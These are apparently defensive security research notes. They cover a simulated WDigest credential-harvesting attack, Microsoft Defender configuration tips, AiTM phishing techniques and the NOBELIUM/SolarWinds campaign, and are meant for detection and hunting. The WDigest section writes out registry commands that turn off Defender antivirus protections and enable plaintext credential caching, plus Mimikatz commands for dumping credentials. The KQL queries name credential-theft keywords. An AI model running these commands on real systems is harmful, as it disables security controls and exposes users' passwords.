Hunting 7 | 8 | #### Attack overview 9 | WDigest, an outdated authentication protocol still found in corporate networks, is exploited by attackers to steal passwords and evade security measures. 10 | Its use exposes passwords in plain text, making it a favored target. Attackers modify registry settings to enable WDigest, often using various attack vectors. 11 | 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/05b4876b-ebe3-48fc-8b59-398cffe0d928) 14 | > WDigest credential harvesting attack flow, [Threat Analytics](https://learn.microsoft.com/en-us/microsoft-365/security/defender/threat-analytics?view=o365-worldwide) in Microsoft 365 Defender 15 | 16 | ## Attack technique 17 | The attack flow begins with disabling the antivirus solution to change a registry key, enabling WDigest, and downloading the Mimikatz tool. 18 | Following this, a command is executed to enable WDigest and run the Mimikatz tool using the "sekurlsa::wdigest" command. 19 | 20 | #### 1. Disable Microsoft Defender antivirus 21 | - [x] DisableRealtimeMonitoring, [Real-time protection] 22 | - [x] SpynetReporting, [Cloud-delivered protection] 23 | - [x] SubmitSamplesConsent, [Automatic sample submission] 24 | 25 | ```powershell 26 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f 27 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d 0 /f 28 | reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f 29 | ``` 30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/28105886-3f1d-4cea-8de8-c7048a60bd9a) 32 | 33 | > [!Important] 34 | > These commands disabled Microsoft Defender Antivirus configurations. To prevent and detect these attack techniques, enabling [Tamper Protection](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide) is the most effective approach, as it safeguards against disabling antivirus. 35 | 36 | #### 2. Enable Wdigest 37 | [MITRE | ATT&CK, Modify Registry, T1112, Wdigest](https://attack.mitre.org/techniques/T1112/) 38 | 39 | ```powershell 40 | reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f 41 | ``` 42 | 43 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49e3a65c-fe1c-42da-9ac6-902fa5f1f51b) 44 | 45 | > [!Important] 46 | > Even if the antivirus didn't detect and prevent the WDigest configuration change, Microsoft Defender for Endpoint, as EDR solution, can detect these activities and provide alerts. 47 | 48 | #### 3. Download & Execute Mimikatz tool 49 | Download - [GitHub - ParrotSec/mimikatz](https://github.com/ParrotSec/mimikatz) 50 | 51 | ```mimikatz 52 | mimikatz # privilege::debug 53 | mimikatz # sekurlsa::wdigest 54 | ``` 55 | 56 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/9ef03db8-22a6-45fc-a8ca-5ac7dd4bb298) 57 | 58 | > [!Important] 59 | > In terms of endpoint protection, Microsoft Defender Antivirus and Microsoft Defender for Endpoint are the most effective solutions for preventing and detecting Mimikatz activities. 60 | > Additionally, when it comes to addressing lateral movement and enhancing identity visibility, Microsoft Defender for Identity is a valuable product for detecting such activities. 61 | 62 | ## Detection 63 | After simulating a WDigest credential harvesting attack, let's examine how this attack is mapped into a single incident in Microsoft 365 Defender portal. 64 | 65 | All the attack techniques, from disabling antivirus to executing Mimikatz, were detected by Microsoft Defender for Endpoint, generating 11 alerts. Additionally, Threat Analytics provides insights related to Mimikatz and WDigest credential harvesting. 66 | 67 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/1c9c3f9d-4ff2-4269-b67f-f6d6a67f72b3) 68 | 69 | In the incident page, you might see a number of alerts, related assets, MITRE techniques, and more. 70 | At the same time, I'd like to highlight some alerts from the simulation as shown below. 71 | 72 | #### ***Alert : Microsoft Defender Antivirus protection turned off*** 73 | A protection feature in Microsoft Defender Antivirus has been turned off. An attacker might be trying to evade detection. 74 | 75 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/dde8b17c-38bc-4847-87fc-d8940ebc8313) 76 | 77 | #### ***Alert : WDigest configuration change*** 78 | An attempt to turn on the WDigest authentication provider through the registry was observed. 79 | If the attempt is successful, WDigest will load on the next restart and begin to store credentials as plaintext in LSASS process memory. An attacker might be attempting to collect those credentials. 80 | 81 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8065422f-a296-46a3-82a0-71a0997108db) 82 | 83 | #### ***Alert : Malicious credential theft tool execution detected*** 84 | A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more. 85 | > [!Note] 86 | > The two mimikatz commands (mimikatz # privilege::debug, mimikatz # sekurlsa::wdigest) which I simulated on the device were detected by Microsoft Defender for Endpoint. Also, an alert - 'Mimikatz credential theft tool' was triggered when downloading Mimikatz on the device. 87 | 88 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/d4325269-853e-4488-837d-2a56e77b0928) 89 | 90 | 91 | ## Threat Hunting 92 | For threat hunting purposes, here are some KQL queries to track activities like disabling antivirus, changing WDigest configurations, and executing Mimikatz tool. 93 | 94 | #### Defender Antivirus configuration 95 | This query will hunt for registry key activities related to Microsoft Defender Antivirus. 96 | 97 | ```kql 98 | DeviceRegistryEvents 99 | | where Timestamp > ago(30d) 100 | | where RegistryKey has @"HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" 101 | | project-reorder Timestamp, DeviceId, DeviceName, ActionType, RegistryKey, RegistryValueType, RegistryValueName, RegistryValueData 102 | | sort by Timestamp desc 103 | ``` 104 | 105 | #### WDigest configuration change 106 | This query helps identify attempts to enable WDigest credentiall caching through the registry. 107 | 108 | ```kql 109 | union DeviceRegistryEvents, DeviceProcessEvents 110 | // Find attempts to turn on WDigest credential caching 111 | | where RegistryKey contains "wdigest" and RegistryValueName == "UseLogonCredential" and RegistryValueData == "1" or 112 | // Find processes created with commandlines that attempt to turn on WDigest caching 113 | ProcessCommandLine has "WDigest" and ProcessCommandLine has "UseLogonCredential" and ProcessCommandLine has "dword" and ProcessCommandLine has "1" 114 | | project Timestamp, DeviceName, PreviousRegistryValueData, 115 | RegistryKey, RegistryValueName, RegistryValueData, FileName, ProcessCommandLine, 116 | InitiatingProcessAccountName, InitiatingProcessFileName, 117 | InitiatingProcessCommandLine, InitiatingProcessParentFileName 118 | ``` 119 | > **Source** : WDigest credential harvesting, Threat Analytics in Microsoft 365 Defender 120 | 121 | #### Mimikatz CommandLine 122 | This query helps display all unique Mimikatz command-line activities for each device. 123 | 124 | ```kql 125 | DeviceProcessEvents 126 | | where Timestamp > ago(30d) 127 | | where FileName in~ ("powershell.exe","powershell_ise.exe", "mimikatz.exe") 128 | | where ProcessCommandLine has_any ("sekurlsa","kerberos","crypto", "vault", "lsadump") or InitiatingProcessCommandLine has_any ("sekurlsa","kerberos","crypto", "vault", "lsadump") 129 | | summarize make_set(ProcessCommandLine) by DeviceId, DeviceName 130 | ``` 131 | 132 | ## Reference 133 | 1. [Forcing WDigest to Store Credentials in Plaintext](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/forcing-wdigest-to-store-credentials-in-plaintext) 134 | 2. "WDigest credential harvesting", from [Threat Analytics](https://learn.microsoft.com/en-us/microsoft-365/security/defender/threat-analytics?view=o365-worldwide) in Microsoft 365 Defender 135 | 136 | #### Disclaimer 137 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 138 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day05-AntivirusConfig-Tips.md: -------------------------------------------------------------------------------- 1 | # Day5 - Microsoft Defender Antivirus - Recommendations & Tips 2 | Firstly, Microsoft Defender Antivirus is not just EPP which is designed to only prevent known threats. It includes various feature engines to detect and protect against threats in both **pre-execution and post-execution stages**. 3 | In this blog, I would like to share recommended configurations and tips for Microsoft Defender Antivirus. I hope that these insights will be helpful for configuring the antivirus in the future. 4 | 5 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/da052b9d-cf65-47da-9727-eff144aff868) 6 | > Defender Antivirus engines - [In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks](https://www.microsoft.com/en-us/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/) 7 | 8 | ## Recommendations & Tips (consideration) 9 | Regarding Microsoft Defender Antivirus(MDAV) configuration, there is **no one-size-fits-all recommendation** due to the evolving nature of cyber attacks. 10 | However, there are certain features that ***you should enable and consider when deploying MDAV solution.*** 11 | 12 | This is the great example story I received from a senior colleague whom I deeply respect. When the air conditioner is turned on, everyone has a different comfort level in terms of temperature. This means that the preferred temperature can vary among individuals, ranging from 18°C to 28°C, or even higher. Therefore, in the context of antivirus configuration, while there are certain features that are generally recommended to enable for MDAV, the specific settings, such as scan time, day, update frequency, and others, can vary depending on the organization's needs and business requirements. 13 | 14 | #### Recommendations 15 | | # | Configuration Name | Comment | 16 | | :-- | :-- | :-- | 17 | | 1 | Real-time protection | Recommend turning on real-time protection. | 18 | | 2 | Cloud protection | Recommend turning on cloud protection.
- [Block at First Sight(BAFS)](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide) | 19 | | 3 | Sample submission | Recommend turning on submit samples consent.
Since it's a prerequisite for using BAFS, you need to select one of the options below:
- ***Send safe samples automatically (default)***
- Always Prompt
- Send all samples automatically| 20 | | 4 | PUA Protection | Recommend turning on PUA Protection. 21 | | 5 | Tamper Protection | Highly recommend turning on Tamper Protection and here are some blogs that discuss this feature.
- [Make sure Tamper Protection is turned on](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/make-sure-tamper-protection-is-turned-on/ba-p/2695568)
- [Hunting down LemonDuck and LemonCat attacks](https://www.microsoft.com/en-us/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/) | 22 | 23 | #### Tips (consideration) 24 | | # | Configuration Name | Comment | 25 | | :-- | :-- | :-- | 26 | | 6 | Scan type | In most cases, **a quick scan** is sufficient and is the recommended option for scheduled scans.
- [Schedule regular quick and full scans with Microsoft Defender Antivirus](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/schedule-antivirus-scans?view=o365-worldwide)| 27 | | 7 | Antivirus protection updates |Keeping your antivirus protection up to date is critical - Fallback order.
- [Manage the sources for Microsoft Defender Antivirus protection updates](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/manage-protection-updates-microsoft-defender-antivirus?view=o365-worldwide)
- [Microsoft Defender Antivirus updates - Previous versions for technical upgrade support](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support?view=o365-worldwide) | 28 | | 8 | Antivirus network connections | To ensure Microsoft Defender Antivirus cloud-delivered protection works properly, your security team must configure your network to allow connections between your endpoints and certain Microsoft servers.
- [Configure and validate Microsoft Defender Antivirus network connections](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus?view=o365-worldwide) | 29 | 30 | #### Antivirus misconfiguration and vulnerable configuration 31 | By filtering antivirus in Microsoft Defender Vulnerability Management, MDE, you can identify any antivirus misconfigurations and vulnerable configurations in your tenant. 32 | Using KQL with Advanced Hunting, you can also identify these configurations by using the following KQL query. 33 | 34 | ```kql 35 | DeviceTvmSecureConfigurationAssessmentKB 36 | | where ConfigurationSubcategory == "Antivirus" 37 | ``` 38 | 39 | - [What is Microsoft Defender Vulnerability Management](https://learn.microsoft.com/en-us/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide) 40 | - [DeviceTvmSecureConfigurationAssessmentKB table in the advanced hunting schema](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-devicetvmsecureconfigurationassessmentkb-table?view=o365-worldwide) 41 | 42 | 43 | ## Note 44 | #### Cloud block timeout period 45 | According to [Microsoft docs](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-cloud-block-timeout-period-microsoft-defender-antivirus?view=o365-worldwide), when Microsoft Defender Antivirus finds a suspicious file, it can prevent the file from running while it queries the Microsoft Defender Antivirus cloud service. The default period that the file is blocked is 10 seconds. That sounds great but cloud block timeout period can potentially impact files or programs that require more time to complete their operations. In such cases, if the file or program exceeds the maximum timeout of 60 seconds, it may be interrupted or prevented from executing, which could lead to functionality issues. Therefore, generally speaking, ***a 10-second timeout is recommended***. 46 | 47 | #### CPU performance 48 | If you have any concerns about CPU performance, please check the following parameters: 49 | 50 | 1. ***CPU usage limit per scan (CSP: AvgCPULoadFactor)***
51 | This policy setting allows you to configure the maximum percentage CPU utilization permitted during a scan. The default value is 50. 52 | 2. ***Use low CPU priority for scheduled scans (CSP: EnableLowCPUPriority)***
53 | This policy setting allows you to enable or disable low CPU priority for scheduled scans. 54 | 55 | #### Exclusions 56 | If you have any concerns regarding Windows Server or misconfigurations related to exclusions, these documents can be helpful. In particular, they provide well-written guidance on paths, extensions, and processes that are ***Not recommended to be excluded due to the potential for attacks.*** 57 | 1. [Configure Microsoft Defender Antivirus exclusions on Windows Server](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-server-exclusions-microsoft-defender-antivirus?view=o365-worldwide) 58 | 2. [Common mistakes to avoid when defining exclusions](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/common-exclusion-mistakes-microsoft-defender-antivirus?view=o365-worldwide) 59 | 60 | 61 | 62 | ## Reference 63 | 1. [Defender Policy CSP - Windows Client Management](https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-defender?WT.mc_id=Portal-fx) 64 | 2. [Windows Antivirus policy settings for Microsoft Defender Antivirus for Intune](https://learn.microsoft.com/en-us/mem/intune/protect/antivirus-microsoft-defender-settings-windows) 65 | 3. [MDE Antivirus Configuration Common Mistakes and Best Practice](https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/mde-antivirus-configuration-common-mistakes-and-best-practice/ba-p/2127405) 66 | 4. [In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks](https://www.microsoft.com/en-us/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/) 67 | 5. [Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection](https://www.microsoft.com/en-us/security/blog/2019/06/24/inside-out-get-to-know-the-advanced-technologies-at-the-core-of-microsoft-defender-atp-next-generation-protection/) 68 | 6. [How artificial intelligence stopped an Emotet outbreak](https://www.microsoft.com/en-us/security/blog/2018/02/14/how-artificial-intelligence-stopped-an-emotet-outbreak/) 69 | 7. [Out of sight but not invisible: Defeating fileless malware with behavior monitoring, AMSI, and next-gen AV](https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) 70 | 71 | #### Disclaimer 72 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 73 | 74 | 75 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day07-AiTM-Insights-XDR.md: -------------------------------------------------------------------------------- 1 | # Day 7 - AiTM attack insights 2 | 3 | AiTM attack refers to ***"Adversary-in-The-Middle"*** phishing technique where attackers intercept communication between a user and a legitimate website, stealing passwords and session cookies to gain unauthorized access and perform fraudulent activities. 4 | 5 | 6 | ## AiTM - "From cookie theft to BEC" 7 | As part of the "From cookie theft to BEC" attack, the attacker initiates the process by sending phishing emails to the target. Upon clicking a link in the email, the user is directed to a fake website. At this point, the attackers establish a proxy server between the target user and the intended website. This setup allows the attacker to intercept and capture the user's password and session cookie, providing them with the means to authenticate and access the user's session on the website. After successfully authenticating, for example, to Outlook, they can read email content or create a forwarding rule to identify the target of the fraud. Once they have identified the target, they take action to initiate multiple fraud attempts. 8 | 9 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/10b9b7d8-f1bf-4c73-9259-7d1455c07a0d) 10 | 11 | > Figure 1. AiTM attack kill chain, [MS security blog, July 12, 2022](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 12 | 13 | 14 | ### Open-source AiTM phishing toolkits 15 | As there are tools available on the internet, attackers utilize them for conducting AiTM attacks. 16 | - [Evilginx2](https://github.com/kgretzky/evilginx2) 17 | - [Modlishka](https://github.com/drk1wi/Modlishka) 18 | - [Muraena](https://github.com/muraenateam/muraena) 19 | 20 | ### Phishing mail pattern 21 | At this time, based on third-party research, attackers are targeting enterprise users of Gmail or Outlook with emails related to password reset, password expiry, voice message logs, and accessing office-related and other content. 22 | 23 | ### Initial access - phishing email 24 | As the attacker aims to successfully lure the target to a phishing site and avoid detection by mail security, they primarily rely on two attack techniques, as follows. 25 | - Type Ⅰ : HTML file attachment 26 | - Type Ⅱ : Phishing link 27 | - Type Ⅲ : [Open Redirect](https://cwe.mitre.org/data/definitions/601.html) 28 | 29 | Based on research conducted by third parties, Type Ⅰ has been observed that attackers commonly employ the technique of ***window.location.replace()*** to redirect users to phishing sites. 30 | 31 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/2b255140-c15e-4027-9ff5-230c2bf3a56e) 32 | > HTML attachment with URL redirection | [Zscaler, AiTM report](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) 33 | 34 | e.g. 35 | | Language | Code | 36 | |:---------|:-----| 37 | | JavaScript | window.location.replace("hxxps://example.com") | 38 | | JavaScript | window.location.href = "hxxps://example.com" | 39 | | HTML | \ | 40 | | PHP | \ | 41 | > [!Note] 42 | > 43 | > **JavaScript** : "replace()" is used for one-time, immediate page replacement without maintaining history, while setting the "href" property allows navigation to a new URL while preserving the ability to go back using the browser's history. 44 | > 45 | > **PHP** : JavaScript handles client-side redirection within the browser, while PHP manages server-side redirection on the server before the response is sent to the client's browser. 46 |
47 | 48 | **Open Redirect ?** 49 | 50 | An open redirect is a vulnerability in a web application that allows attackers to redirect users to malicious websites by manipulating URL parameters. It occurs when the application fails to validate or restrict user-supplied input used for redirection. Attackers exploit this vulnerability for phishing or other malicious purposes. 51 | 52 | ```url 53 | PHP : http://example.com/example.php?url=http://malicious.example.com 54 | ``` 55 | ```html 56 | HTML : Click here to log in 57 | ``` 58 | 59 | > Reference - [CWE-601: URL Redirection to Untrusted Site ('Open Redirect')](https://cwe.mitre.org/data/definitions/601.html) 60 | 61 | 62 | 63 | 64 | > Open Redirect pages, [Zscaler, AiTM report](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) 65 |
66 | 67 | **Base64** 68 | 69 | According to the Microsoft Security blog, attackers not only use URL redirection methods but also employ base64 encoding in JavaScript to encode the end-user's email address if it exists. 70 | 71 | **e.g.** Microsoft observed that the redirector page used the following URL format: 72 | ``` 73 | hxxp://[username].[wildcard domain].[tld]/#[user email encoded in Base64] 74 | ``` 75 | 76 | |JavaScript | Memo | 77 | |:----------|:-----| 78 | | btoa() | Encodes a string in base-64 | 79 | | atob() | Decode a base-64 encoded string | 80 | > Reference - [Window btoa()](https://www.w3schools.com/jsref/met_win_btoa.asp) / [Window atob()](https://www.w3schools.com/jsref/met_win_atob.asp) 81 | 82 | 83 | 84 | > Source code of the HTML attachment, [Microsoft, AiTM report](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 85 | 86 | 87 | 88 | 89 | ## KQL : Hunting 90 | Summarized each phase of the AiTM attack. These queries will help in hunting potential AiTM/BEC activities. 91 | 92 | 1. [13-kql-AiTM-HuntingInsight-Part1.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part1.pdf) 93 | 2. [13-kql-AiTM-HuntingInsight-Part2.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part2.pdf) 94 | 3. [13-kql-AiTM-HuntingInsight-Part3.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part3.pdf) 95 | 4. [13-kql-AiTM-HuntingInsight-Part4.pdf](https://github.com/LearningKijo/KQL/blob/main/KQL-Effective-Use/13-kql-AiTM-HuntingInsight-Part4.pdf) 96 | 97 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cee2680e-f8be-41a0-b24f-18c0c96acfd3) 98 | 99 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/cec632df-c9f7-4a74-b0a4-11eea8ef5d72) 100 | 101 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/79617151-c385-4bf9-8b04-ea57a24318db) 102 | 103 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/462a2a68-c945-4e58-8e37-b3de6bb4659d) 104 | 105 | ## MS security blogs : AiTM attack timeline 106 | 107 | - July 12, 2022, [From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud](https://www.microsoft.com/en-us/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/) 108 | - November 16, 2022, [Token tactics: How to prevent, detect, and respond to cloud token theft](https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/) 109 | - March 13, 2023, [DEV-1101 enables high-volume AiTM campaigns with open-source phishing kit](https://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/) 110 | - June 8, 2023, [Detecting and mitigating a multi-stage AiTM phishing and BEC campaign](https://www.microsoft.com/en-us/security/blog/2023/06/08/detecting-and-mitigating-a-multi-stage-aitm-phishing-and-bec-campaign/) 111 | 112 | ## MS blogs : AiTM attack insights 113 | - Jul 31, 2023, [AiTM & BEC threat hunting with KQL](https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166) 114 | - Sep 19, 2023, [A day in the life of a Defender Experts for XDR analyst](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/a-day-in-the-life-of-a-defender-experts-for-xdr-analyst/ba-p/3932140) 115 | 116 | ## Other blogs 117 | - August 02, 2022, [Large-Scale AiTM Attack targeting enterprise users of Microsoft email services](https://www.zscaler.com/blogs/security-research/large-scale-aitm-attack-targeting-enterprise-users-microsoft-email-services) (Zscaler) 118 | - August 09, 2022, [AitM Phishing Attack Targeting Enterprise Users of Gmail](https://www.zscaler.jp/blogs/security-research/aitm-phishing-attack-targeting-enterprise-users-gmail) (Zscaler) 119 | - November, 09, 2022, [Trellix Insights: Large-Scale AiTM Attack Targeting Enterprise Users](https://kcm.trellix.com/corporate/index?page=content&id=KB96139&locale=en_US) (Trellix) 120 | 121 | #### Disclaimer 122 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 123 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day02-APT29-Part3-Midnight-Blizzard.md: -------------------------------------------------------------------------------- 1 | # Day 2 - APT29, Midnight Blizzard (NOBELIUM) 2 | > 📢 April 18, 2023 - Microsoft has changed its naming taxonomy for threat actors, moving away from using element symbols to using [weather-related names](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/). APT29 attack was named Midnight Blizzard in Microsoft's new naming taxonomy for threat actors. In this blog, I will use the name "NOBELIUM" instead of Midnight Blizzard. 3 | 4 | 5 | ## What is NOBELIUM? 6 | NOBELIUM is a Russian state-sponsored hacking group that conducts cyber espionage and attacks against various targets. It was previously known as APT29 or Cozy Bear and is responsible for high-profile attacks such as **the SolarWinds hack**. 7 | 8 | According to ***Microsoft Security blog update***, 9 | > Microsoft continues to work with partners and customers to expand our knowledge of the threat actor behind the nation-state cyberattacks that compromised the supply chain of SolarWinds and impacted multiple other organizations. Microsoft previously used **‘Solorigate’ as the primary designation for the actor**, but moving forward, we want to place appropriate focus on the actors behind the sophisticated attacks, rather than one of the examples of malware used by the actors. **Microsoft Threat Intelligence Center (MSTIC) has named the actor behind the attack against SolarWinds, the SUNBURST backdoor, TEARDROP malware, and related components as NOBELIUM.** As we release new content and analysis, we will use NOBELIUM to refer to the actor and the campaign of attacks. 10 | 11 | #### Key words of NOBELIUM 12 | SolarWinds, the SUNBURST backdoor, TEARDROP malware, Supply chain attack, Solorigate 13 | 14 | ## NOBELIUM Attack Chain 15 | The attackers added malicious code to the SolarWinds Orion Platform DLL file, which was distributed as part of a software update. The DLL file was digitally signed, indicating that the attackers had access to the company's software development and distribution pipeline. The malicious code created a backdoor, which allowed the attackers to operate in compromised networks without being detected. The backdoor was designed to blend in with the rest of the code, making it difficult to spot. The attackers used a lengthy list of functions and capabilities to perform a wide range of actions, including reconnaissance, privilege escalation, and lateral movement. The attackers took many steps to maintain a low profile, such as using unique subdomains for each affected domain to evade detection. 16 | 17 | ![image](https://user-images.githubusercontent.com/120234772/230338300-734224cb-f248-47df-8472-18aaa4f0c662.png) 18 | > [Microsoft Security Blog](https://www.microsoft.com/en-us/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/), NOBELIUM infection chain 19 | 20 | #### The initial proncess 21 | 1. The SolarWinds.BusinessLayerHost.exe file is a legitimate file used by the SolarWinds Orion IT management software. 22 | 2. The malicious activity was not directly caused by the executable file, but rather by a compromised DLL file that was loaded into the executable. 23 | 3. The attackers were able to insert the malicious code into the DLL file during an early stage of the software build, before the final stages that would include digitally signing the compiled code. 24 | 4. The compromised DLL file is digitally signed, which enhances its ability to run privileged actions and avoid detection. 25 | 5. The malicious code is designed to be lightweight and run in the background, so as not to interfere with the normal operation of the SolarWinds software. 26 | 6. Once the malicious code is loaded, it allows the attackers to perform a wide range of actions and move laterally across the network, with the ultimate goal of achieving their objectives, which may include cyber espionage or financial gain. 27 | 28 | ## Incident Response, Containment 29 | ### What if your environment is compromised by APT29 (Nobelium)? 30 | If your environment has been compromised by the Nobelium attack, the first step you should take is **"Containment"**. 31 | Regarding "Containment", if you are using Microsoft Security solutions such as Microsoft Defender for Endpoint (MDE) or Microsoft Defender for Identity (MDI), then take the following actions: 32 | - [Isolate devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network) 33 | - [Contain devices from the network](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network) 34 | - [Reset user account password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 35 | - [Disbale AD user / Azure AD user](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) 36 | 37 | If you are not using Microsoft Security solution, then take the following actions: 38 | - Immediately isolate the affected device 39 | - Reset passwords or decommission the accounts 40 | 41 | ![image](https://user-images.githubusercontent.com/120234772/230063443-8b3f59d1-d3b5-4e69-b667-c7b8e7c2ea21.png) 42 | > NIST 800-61 response management phases 43 | After the containment, move to the investigation and recovery. 44 | 45 | ## Preparing for NOBELIUM 46 | These are **key messages** from Microsoft Defenders. 47 | 48 | #### Prioritize cyber hygiene 49 | - Vulnerability management & Patching 50 | - Zero Trust implementation 51 | - Protect your identity, e.g. Enable MFA 52 | - Use secure devices for critical tasks 53 | 54 | #### Secure your distributed estate 55 | - Zero Trust implementation 56 | - Need advanced monitoring system tools such as SIEM, XDR and EDR 57 | 58 | #### Plan for your response 59 | - Collect data for further investigaton 60 | - Leverage Threat Intelligence for the investigation 61 | - Need well practice/training in incident response specifically for APT29 attacks 62 | - Think about Incident Response plan 63 | - Think about recovery plan 64 | 65 | 66 | ### Decoding NOBELIUM video: 67 | 1. [Decoding NOBELIUM: When nation-states attack (Episode 1)](https://www.youtube.com/watch?v=VVKT8NehO_c) 68 | 2. [Decoding NOBELIUM: The hunt for a global threat (Episode 2)](https://www.youtube.com/watch?v=VVbSYr1cPEE) 69 | 3. [Decoding NOBELIUM: Countermeasures (Episode 3)](https://www.youtube.com/watch?v=fS97PC4FLCc) 70 | 4. [Decoding NOBELIUM: After-action report (Episode 4)](https://www.youtube.com/watch?v=wFtGD7p58cQ) 71 | 72 | 73 | ## Reference 74 | ### Microsoft Security blog - NOBELIUM : 75 | December 15, 2020, [Ensuring customers are protected from Solorigate](https://www.microsoft.com/en-us/security/blog/2020/12/15/ensuring-customers-are-protected-from-solorigate/)
76 | December 18, 2020, [Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack....](https://www.microsoft.com/en-us/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/)
77 | December 28, 2020, [Using Microsoft 365 Defender to protect against Solorigate](https://www.microsoft.com/en-us/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/)
78 | January 20, 2021, [Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop](https://www.microsoft.com/en-us/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
